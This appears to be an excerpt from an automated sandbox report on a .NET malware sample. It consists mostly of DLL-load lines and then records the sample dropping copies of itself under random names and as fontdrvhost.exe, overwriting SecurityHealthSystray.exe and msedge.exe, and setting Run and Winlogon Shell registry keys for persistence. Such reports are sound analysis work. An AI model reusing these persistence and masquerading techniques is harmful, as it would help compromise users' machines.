                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: userenv.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: wbemcomn.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: uxtheme.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: rasapi32.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: rasman.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: rtutils.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: mswsock.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: winhttp.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: iphlpapi.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: dnsapi.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: winnsi.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: rasadhlp.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: fwpuclnt.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: winmm.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: winmmbase.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: mmdevapi.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: devobj.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: ksuser.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: avrt.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: audioses.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: powrprof.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: umpdc.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: msacm32.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: midimap.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: dwrite.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: windowscodecs.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: edputil.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: ntmarta.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: apphelp.dll
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: mscoree.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: apphelp.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: kernel.appcore.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: version.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: windows.storage.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: wldp.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: profapi.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: cryptsp.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: rsaenh.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: cryptbase.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                                Source: Window Recorder Window detected: More than 3 window changes detected
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                                Source: Wh2c6sgwRo.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                                Source: Wh2c6sgwRo.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                Source: Binary string: 8C:\Users\user\AppData\Local\Temp\obsldskd\obsldskd.pdb source: d3yngi1q.wji.exe, 00000002.00000002.1641016699.00000000035D2000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: 8C:\Users\user\AppData\Local\Temp\zrf14fw5\zrf14fw5.pdb source: d3yngi1q.wji.exe, 00000002.00000002.1641016699.00000000035D2000.00000004.00000800.00020000.00000000.sdmp

                                Data Obfuscation

                                Source: Wh2c6sgwRo.exe, FMIJCCJDKMPOHDNPCEAGFDMNEAPEGCIPGDDK.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                                Source: Wh2c6sgwRo.exe, BAJEDBNFJJBPFHOJPMCIBMAHHLJABPOFMBKC.cs .Net Code: KMODMOGLMDHHLEFABHFJEGEFGNOPNBHEMLFM
                                Source: Wh2c6sgwRo.exe Static PE information: 0x8FECC87F [Sun Jul 8 10:48:31 2046 UTC]
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\obsldskd\obsldskd.cmdline"
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zrf14fw5\zrf14fw5.cmdline"
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exe Code function: 0_2_00007FFB4B29B7AC push ds; ret 0_2_00007FFB4B29B7AD
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe Code function: 2_2_00007FFB4B28E6D3 pushad ; retf 2_2_00007FFB4B28E799
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe Code function: 2_2_00007FFB4B283CB9 push ebx; retf 2_2_00007FFB4B283CBA
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe Code function: 2_2_00007FFB4B28E57D pushad ; retf 2_2_00007FFB4B28E799
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Code function: 30_2_00007FFB4B2B3CB9 push ebx; retf 30_2_00007FFB4B2B3CBA
                                Source: C:\ProgramData\fontdrvhost.exe Code function: 37_2_00007FFB4B2A3CB9 push ebx; retf 37_2_00007FFB4B2A3CBA
                                Source: C:\ProgramData\fontdrvhost.exe Code function: 41_2_00007FFB4B2C3CB9 push ebx; retf 41_2_00007FFB4B2C3CBA
                                Source: C:\ProgramData\fontdrvhost.exe Code function: 47_2_00007FFB4B293CB9 push ebx; retf 47_2_00007FFB4B293CBA
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Code function: 48_2_00007FFB4B2A3CB9 push ebx; retf 48_2_00007FFB4B2A3CBA
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Code function: 50_2_00007FFB4B2B3CB9 push ebx; retf 50_2_00007FFB4B2B3CBA
                                Source: C:\ProgramData\fontdrvhost.exe Code function: 53_2_00007FFB4B2A3CB9 push ebx; retf 53_2_00007FFB4B2A3CBA
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Code function: 54_2_00007FFB4B2B3CB9 push ebx; retf 54_2_00007FFB4B2B3CBA
                                Source: C:\ProgramData\fontdrvhost.exe Code function: 55_2_00007FFB4B283CB9 push ebx; retf 55_2_00007FFB4B283CBA
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Code function: 56_2_00007FFB4B2B3CB9 push ebx; retf 56_2_00007FFB4B2B3CBA

                                Persistence and Installation Behavior

                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe System file written: C:\Windows\System32\SecurityHealthSystray.exe
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe File created: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe File created: C:\Windows\Help\Corporate\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Windows\System32\SecurityHealthSystray.exe
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe File created: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exe File created: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe File created: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe File created: C:\ProgramData\fontdrvhost.exe

                                Boot Survival

                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BQrPGmkzolSuiSkMAkyslxsiiFSSM
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fontdrvhost
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BQrPGmkzolSuiSkMAkyslxsiiFSSM

                                Hooking and other Techniques for Hiding and Protection

